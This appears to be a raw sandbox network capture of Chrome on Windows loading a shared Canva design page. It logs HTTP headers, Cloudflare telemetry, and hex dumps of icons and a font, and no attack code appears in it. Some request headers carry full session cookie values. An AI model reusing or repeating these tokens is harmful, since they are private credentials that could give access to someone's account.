                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC1189INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:45 GMT
                                                                                                                                                                                                                                                                    Content-Type: image/svg+xml
                                                                                                                                                                                                                                                                    Content-Length: 1865
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e59512f3b262369-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                    Age: 1621549
                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                                    ETag: "3e78ef31f2928a74c6d7ba19b91d0570"
                                                                                                                                                                                                                                                                    Expires: Thu, 20 Nov 2025 20:50:31 GMT
                                                                                                                                                                                                                                                                    Last-Modified: Tue, 15 Oct 2024 03:57:54 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Thu, 16 Oct 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                                    x-amz-id-2: jw7rzs5uVXRdC9j1wF3CfqtLfKB1gp1T80PFc3MaQ5Sq1tqj7LNve3ratOiL7bKStj/+/CZ8+ZQ=
                                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                    x-amz-request-id: 2HE990H9A0621KZA
                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                    x-amz-version-id: Xikq.2KyZ83h9C3fWv5yHatCFZS0el.H
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC348INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 72 30 54 77 65 4a 25 32 42 58 52 5a 71 43 49 4b 71 6d 68 6d 6b 46 64 65 6d 49 30 39 45 57 6c 59 52 4c 31 34 7a 4b 35 71 25 32 46 55 33 35 6a 5a 76 65 39 44 6b 45 77 79 6a 56 4e 6a 75 52 66 64 72 50 6c 47 74 64 38 6a 48 45 45 57 4c 41 34 44 30 6e 71 63 79 53 53 46 73 5a 61 41 76 73 55 65 51 78 6e 5a 50 55 4c 56 62 47 33 6d 58 56 4f 36 42 72 36 4b 6f 5a 61 5a 6a 31 37 6c 51 58 6a 48 59 49 31 46 70 4b 4d 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d
                                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r0TweJ%2BXRZqCIKqmhmkFdemI09EWlYRL14zK5q%2FU35jZve9DkEwyjVNjuRfdrPlGtd8jHEEWLA4D0nqcySSFsZaAvsUeQxnZPULVbG3mXVO6Br6KoZaZj17lQXjHYI1FpKM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC1201INData Raw: 3c 73 76 67 20 77 69 64 74 68 3d 22 33 33 22 20 68 65 69 67 68 74 3d 22 33 32 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 33 33 20 33 32 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 3c 70 61 74 68 20 64 3d 22 4d 33 32 2e 32 39 20 31 36 63 30 20 38 2e 38 33 37 2d 37 2e 31 36 34 20 31 36 2d 31 36 20 31 36 2d 38 2e 38 33 37 20 30 2d 31 36 2d 37 2e 31 36 33 2d 31 36 2d 31 36 20 30 2d 38 2e 38 33 36 20 37 2e 31 36 33 2d 31 36 20 31 36 2d 31 36 20 38 2e 38 33 36 20 30 20 31 36 20 37 2e 31 36 34 20 31 36 20 31 36 5a 22 20 66 69 6c 6c 3d 22 75 72 6c 28 23 5f 33 39 30 30 36 36 33 33 39 34 5f 5f 61 29 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 32 36 2e 31 33 31 20 31
                                                                                                                                                                                                                                                                    Data Ascii: <svg width="33" height="32" viewBox="0 0 33 32" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M32.29 16c0 8.837-7.164 16-16 16-8.837 0-16-7.163-16-16 0-8.836 7.163-16 16-16 8.836 0 16 7.164 16 16Z" fill="url(#_3900663394__a)"/><path d="M26.131 1
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC664INData Raw: 22 23 36 36 34 35 30 30 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 37 2e 38 31 38 20 32 30 2e 37 30 36 73 32 2e 38 32 34 2e 39 34 20 38 2e 34 37 2e 39 34 63 35 2e 36 34 38 20 30 20 38 2e 34 37 31 2d 2e 39 34 20 38 2e 34 37 31 2d 2e 39 34 73 2d 31 2e 38 38 32 20 33 2e 37 36 35 2d 38 2e 34 37 20 33 2e 37 36 35 63 2d 36 2e 35 38 38 20 30 2d 38 2e 34 37 2d 33 2e 37 36 35 2d 38 2e 34 37 2d 33 2e 37 36 35 5a 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 39 2e 35 35 37 20 32 35 2e 36 32 38 61 34 2e 37 30 35 20 34 2e 37 30 35 20 30 20 30 20 31 2d 35 2e 37 32 20 33 2e 34 30 32 20 34 2e 37 30 34 20 34 2e 37 30 34 20 30 20 30 20 31 2d 33 2e 34 30 32 2d 35 2e 37 31 38 63 2e 36 34 2d 32 2e 35 32 20 35 2e 39 36 34 2d 38 2e 31 39 36 20 36 2e 38
                                                                                                                                                                                                                                                                    Data Ascii: "#664500"/><path d="M7.818 20.706s2.824.94 8.47.94c5.648 0 8.471-.94 8.471-.94s-1.882 3.765-8.47 3.765c-6.588 0-8.47-3.765-8.47-3.765Z" fill="#fff"/><path d="M9.557 25.628a4.705 4.705 0 0 1-5.72 3.402 4.704 4.704 0 0 1-3.402-5.718c.64-2.52 5.964-8.196 6.8


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    79192.168.2.1249803104.16.102.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC1663OUTPOST /cdn-cgi/rum? HTTP/1.1
                                                                                                                                                                                                                                                                    Host: www.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    Content-Length: 1655
                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                    sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    content-type: application/json
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Origin: https://www.canva.com
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                    Referer: https://www.canva.com/design/DAGXBQfQ3AM/BvO9V97vV3Qk87FqBY6pdQ/view?utm_content=DAGXBQfQ3AM&utm_campaign=designshare&utm_medium=link&utm_source=editor
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: CDI=f20b90ec-5e8f-4bb6-be48-451829eebec0; CPA=cnvan_Mm-faQPj7cgjjfGq6GzlGnv-LOH1K4zTMBzaJlKmdEA3HuR7WKxgoSvxqxYeFKUV9yxMdAtpdk9zNQJFa_IhnEKwi3xFMW9OnFWo36Iz1j0M0xp8OpJXxEKJB6rLpd-zt_peq3WcAiBfDzVWlPWudaJO_-uzpuX2SukFPS7281LKqMMIGp1A0Dnt3Sx9iyRr6R4OicMxut94uyp5i51bfLaKQDb_MlwoIEM3_cAdbSk4mwfDnTiE1KU6XktDXBgcKi7_rhxx2pdjt44M13RqfK_vQBo0NfALAr7OzLB4uhvQ1ro9cewoIcJVxm1fXlyEtgJt95DqEuXNkDsJkudb88vX5Y86P-b9xjxUCgaZANJrxvhqTo6x8nmmEvFgK0GCN6dYgHPV57DOyJ2aDTO6ONzB3y0S7ZCuR1wu2xET7wa6SS4h6f4NmiWzOpuAj9IBVSuodghvL8H7iUp3ENM165eJghffHtb1Bn39zAkomdUGLoP6898ePkOeIDG5idPD8KELAa768b4e0; CCK=-E0EZumFSVkMqawq7C6qsw; __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000; ASI=01JD51FV1VGM6BED24P74ETQK2
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC1655OUTData Raw: 7b 22 6d 65 6d 6f 72 79 22 3a 7b 22 74 6f 74 61 6c 4a 53 48 65 61 70 53 69 7a 65 22 3a 32 37 39 33 35 39 39 31 2c 22 75 73 65 64 4a 53 48 65 61 70 53 69 7a 65 22 3a 32 31 39 36 33 35 31 31 2c 22 6a 73 48 65 61 70 53 69 7a 65 4c 69 6d 69 74 22 3a 32 31 37 32 36 34 39 34 37 32 7d 2c 22 72 65 73 6f 75 72 63 65 73 22 3a 5b 5d 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 65 76 65 6e 74 54 79 70 65 22 3a 31 2c 22 66 69 72 73 74 50 61 69 6e 74 22 3a 30 2c 22 66 69 72 73 74 43 6f 6e 74 65 6e 74 66 75 6c 50 61 69 6e 74 22 3a 30 2c 22 73 74 61 72 74 54 69 6d 65 22 3a 31 37 33 32 31 31 34 38 38 30 39 30 30 2e 35 2c 22 76 65 72 73 69 6f 6e 73 22 3a 7b 22 66 6c 22 3a 22 32 30 32 34 2e 31 30 2e 35 22 2c 22 6a 73 22 3a 22 32 30 32 34 2e 36 2e 31 22 2c 22 74 69 6d 69
                                                                                                                                                                                                                                                                    Data Ascii: {"memory":{"totalJSHeapSize":27935991,"usedJSHeapSize":21963511,"jsHeapSizeLimit":2172649472},"resources":[],"referrer":"","eventType":1,"firstPaint":0,"firstContentfulPaint":0,"startTime":1732114880900.5,"versions":{"fl":"2024.10.5","js":"2024.6.1","timi
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC370INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:45 GMT
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    access-control-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                                    access-control-allow-methods: POST,OPTIONS
                                                                                                                                                                                                                                                                    access-control-max-age: 86400
                                                                                                                                                                                                                                                                    vary: Origin
                                                                                                                                                                                                                                                                    access-control-allow-credentials: true
                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                    CF-RAY: 8e59512f0edf8ce2-EWR
                                                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    80192.168.2.1249808104.16.103.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC871OUTGET /web/images/3a05dbf1cdd156fcd1677a0b444cc36f.svg HTTP/1.1
                                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC1188INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:45 GMT
                                                                                                                                                                                                                                                                    Content-Type: image/svg+xml
                                                                                                                                                                                                                                                                    Content-Length: 842
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e59512f6d9432e4-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                    Age: 1241651
                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                                    ETag: "3a05dbf1cdd156fcd1677a0b444cc36f"
                                                                                                                                                                                                                                                                    Expires: Thu, 20 Nov 2025 20:50:31 GMT
                                                                                                                                                                                                                                                                    Last-Modified: Tue, 27 Aug 2024 02:38:14 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Thu, 28 Aug 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                                    x-amz-id-2: cPTnkETf4NTfyuVOC4Nfde6rgtEAxTV9HnuOPUZyi2DX5a6HJ4osQVcwxEU0Wu4Fza7vjGhi2z4=
                                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                    x-amz-request-id: B554DY9FRAY99385
                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                    x-amz-version-id: Nf.edrUDuskUuIL9M0gq31Qlj_5bEaFT
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC354INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 78 6c 4d 53 4a 70 7a 70 6f 38 56 7a 30 67 25 32 42 70 38 4d 36 39 58 34 76 58 4b 59 4d 6c 74 53 41 6c 38 43 74 66 33 4a 6d 71 34 70 37 25 32 46 51 62 4d 33 4c 73 47 72 4f 76 46 46 78 51 35 4c 38 55 73 52 4b 35 4d 6e 4a 46 63 4b 55 73 4c 6e 79 73 57 64 38 78 74 79 62 4f 57 53 45 36 42 6c 4a 25 32 42 74 6e 55 47 66 62 61 69 33 51 7a 6b 55 7a 65 6f 56 25 32 46 6d 54 43 71 38 30 51 73 4a 62 63 68 56 55 31 25 32 46 6a 55 34 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30
                                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xlMSJpzpo8Vz0g%2Bp8M69X4vXKYMltSAl8Ctf3Jmq4p7%2FQbM3LsGrOvFFxQ5L8UsRK5MnJFcKUsLnysWd8xtybOWSE6BlJ%2BtnUGfbai3QzkUzeoV%2FmTCq80QsJbchVU1%2FjU4%3D"}],"group":"cf-nel","max_age":60
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC842INData Raw: 3c 73 76 67 20 77 69 64 74 68 3d 22 33 32 22 20 68 65 69 67 68 74 3d 22 33 32 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 33 32 20 33 32 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 3c 70 61 74 68 20 64 3d 22 4d 33 32 20 31 36 63 30 20 38 2e 38 33 37 2d 37 2e 31 36 33 20 31 36 2d 31 36 20 31 36 53 30 20 32 34 2e 38 33 37 20 30 20 31 36 20 37 2e 31 36 33 20 30 20 31 36 20 30 73 31 36 20 37 2e 31 36 33 20 31 36 20 31 36 5a 22 20 66 69 6c 6c 3d 22 75 72 6c 28 23 5f 31 35 36 32 34 30 39 33 36 35 5f 5f 61 29 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 31 32 2e 32 33 35 20 31 32 2e 32 33 35 63 30 20 31 2e 35 36 2d 2e 39 30 33 20 32 2e 38 32 34 2d 32 2e 30 31 37 20
                                                                                                                                                                                                                                                                    Data Ascii: <svg width="32" height="32" viewBox="0 0 32 32" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M32 16c0 8.837-7.163 16-16 16S0 24.837 0 16 7.163 0 16 0s16 7.163 16 16Z" fill="url(#_1562409365__a)"/><path d="M12.235 12.235c0 1.56-.903 2.824-2.017


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    81192.168.2.1249805104.16.102.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC908OUTGET /chunk-batch/images/b46630e470f4040eba7033cf2435edce.woff HTTP/1.1
                                                                                                                                                                                                                                                                    Host: chunk-composing.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                    Origin: https://www.canva.com
                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: font
                                                                                                                                                                                                                                                                    Referer: https://chunk-composing.canva.com/chunk-batch/9791fb4bf6628247.ltr.css+5eb15c719412ac66.ltr.css+a1dc22ba8402ef3d.ltr.css+a0684b0780c739e9.vendor.ltr.css+ddcf8590ae7c901d.ltr.css+ca9cfd0af880d084.ltr.css+14a7f0159a2b69de.ltr.css+202e686830bf1e42.ltr.css+d8958d2938e6e8fe.ltr.css+bc2b400c76016a88.ltr.css+7fc1a90e4d75fcc9.ltr.css
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC1287INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:45 GMT
                                                                                                                                                                                                                                                                    Content-Type: font/woff
                                                                                                                                                                                                                                                                    Content-Length: 1136
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e59512f68be4303-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                    Age: 888185
                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                                    ETag: "b46630e470f4040eba7033cf2435edce"
                                                                                                                                                                                                                                                                    Expires: Thu, 20 Nov 2025 20:50:31 GMT
                                                                                                                                                                                                                                                                    Last-Modified: Tue, 15 Oct 2024 03:58:04 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                                    Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                                    Access-Control-Max-Age: 3000
                                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                                    Timing-Allow-Origin: https://www.canva.com
                                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Thu, 16 Oct 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                                    x-amz-id-2: qJ7Q+cov/Ph1nd8TazQLbdVrtpwH6WT3Xi7tytVofHeuGKw89WfOKRbiAX7wu22C4hXy8ekKWzA=
                                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                    x-amz-request-id: 28G6XSFJHKXWPAEE
                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                    x-amz-version-id: gAryNG9XDrz0RmjSgDtxDyP5jLiD2sz9
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC791INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 5f 63 66 5f 62 6d 3d 37 7a 5a 6a 37 4d 4a 44 6a 33 44 59 71 55 75 66 69 6b 72 2e 4f 37 50 78 46 51 54 4e 5f 32 4d 73 51 62 55 47 7a 68 46 75 4e 4c 59 2d 31 37 33 32 31 31 34 39 30 35 2d 31 2e 30 2e 31 2e 31 2d 43 47 4d 6e 42 76 30 33 6c 47 6f 6b 41 43 44 35 61 32 72 64 76 37 4f 75 55 32 51 39 6a 54 36 6e 34 50 76 35 4d 49 38 67 4e 45 45 4b 55 42 70 39 73 68 4d 42 78 34 6b 46 63 59 65 76 49 33 61 48 64 45 66 53 4f 53 52 34 77 4f 67 6d 59 30 56 30 51 65 2e 5f 36 41 3b 20 70 61 74 68 3d 2f 3b 20 65 78 70 69 72 65 73 3d 57 65 64 2c 20 32 30 2d 4e 6f 76 2d 32 34 20 31 35 3a 33 31 3a 34 35 20 47 4d 54 3b 20 64 6f 6d 61 69 6e 3d 2e 63 61 6e 76 61 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61
                                                                                                                                                                                                                                                                    Data Ascii: Set-Cookie: __cf_bm=7zZj7MJDj3DYqUufikr.O7PxFQTN_2MsQbUGzhFuNLY-1732114905-1.0.1.1-CGMnBv03lGokACD5a2rdv7OuU2Q9jT6n4Pv5MI8gNEEKUBp9shMBx4kFcYevI3aHdEfSOSR4wOgmY0V0Qe._6A; path=/; expires=Wed, 20-Nov-24 15:31:45 GMT; domain=.canva.com; HttpOnly; Secure; Sa
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC660INData Raw: 77 4f 46 46 4f 54 54 4f 00 00 04 70 00 0d 00 00 00 00 06 2c 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 46 46 20 00 00 03 18 00 00 00 eb 00 00 00 f0 03 8b 26 a6 46 46 54 4d 00 00 04 28 00 00 00 1c 00 00 00 1c 8c c0 d0 84 47 44 45 46 00 00 04 04 00 00 00 1a 00 00 00 1e 00 27 00 08 4f 53 2f 32 00 00 01 8c 00 00 00 47 00 00 00 60 58 80 62 a3 63 6d 61 70 00 00 02 c8 00 00 00 37 00 00 01 42 00 0d 02 e8 68 65 61 64 00 00 01 30 00 00 00 33 00 00 00 36 13 17 ee 8d 68 68 65 61 00 00 01 64 00 00 00 1d 00 00 00 24 03 ae 01 6f 68 6d 74 78 00 00 04 20 00 00 00 08 00 00 00 08 01 48 00 48 6d 61 78 70 00 00 01 84 00 00 00 06 00 00 00 06 00 02 50 00 6e 61 6d 65 00 00 01 d4 00 00 00 f1 00 00 01 c8 9d d1 72 b4 70 6f 73 74 00 00 03 00 00 00 00
                                                                                                                                                                                                                                                                    Data Ascii: wOFFOTTOp,CFF &FFTM(GDEF'OS/2G`Xbcmap7Bhead036hhead$ohmtx HHmaxpPnamerpost
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC476INData Raw: 75 95 d8 ad fd 9f 4e 76 ae 6c 4a 27 75 73 6f cf 03 f3 88 13 fb 69 2f 4b ef e4 5e fd c6 b4 13 0e 21 9e ba 71 b0 22 75 25 22 f6 8e e1 0f c6 b9 41 69 00 00 00 78 9c 63 60 60 60 66 80 60 19 06 46 06 10 b0 01 f2 18 c1 7c 16 06 05 20 cd 02 84 20 be e3 ff ff 10 f2 ff 01 a8 4a 06 46 36 06 18 93 7c 40 b1 01 03 0b 00 7d bb 06 f4 00 78 9c 63 60 66 00 83 ff cd 0c 46 40 8a 91 01 0d 00 00 28 55 01 b9 00 00 78 9c 45 8c 21 4f c3 40 1c 47 7f ff b6 5c 93 72 6c d0 a3 0d 81 c3 2c 24 24 48 14 5f a0 0a 8d 6d 32 c8 b2 2c 99 20 64 a1 82 13 f3 07 16 73 82 4c 22 97 54 20 76 9f 60 66 0a bd 6f d1 5b 3b 18 c3 c0 53 cf bc 47 08 02 10 51 74 d7 1d 0e 6e 1f ba a3 1e c8 03 e1 d2 b5 e1 4e c8 49 cf 9d fa ee 28 78 e6 d4 5c 70 7f d2 e4 55 a7 56 3b 12 83 b6 04 f6 25 86 07 12 c7 12 9f 31 fc df
                                                                                                                                                                                                                                                                    Data Ascii: uNvlJ'usoi/K^!q"u%"Aixc```f`F| JF6|@}xc`fF@(UxE!O@G\rl,$$H_m2, dsL"T v`fo[;SGQtnNI(x\pUV;%1


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    82192.168.2.1249804104.16.103.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC825OUTGET /_fb/s/41d36c36b634199c0ebf5e807fda38d0.css HTTP/1.1
                                                                                                                                                                                                                                                                    Host: font-public.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
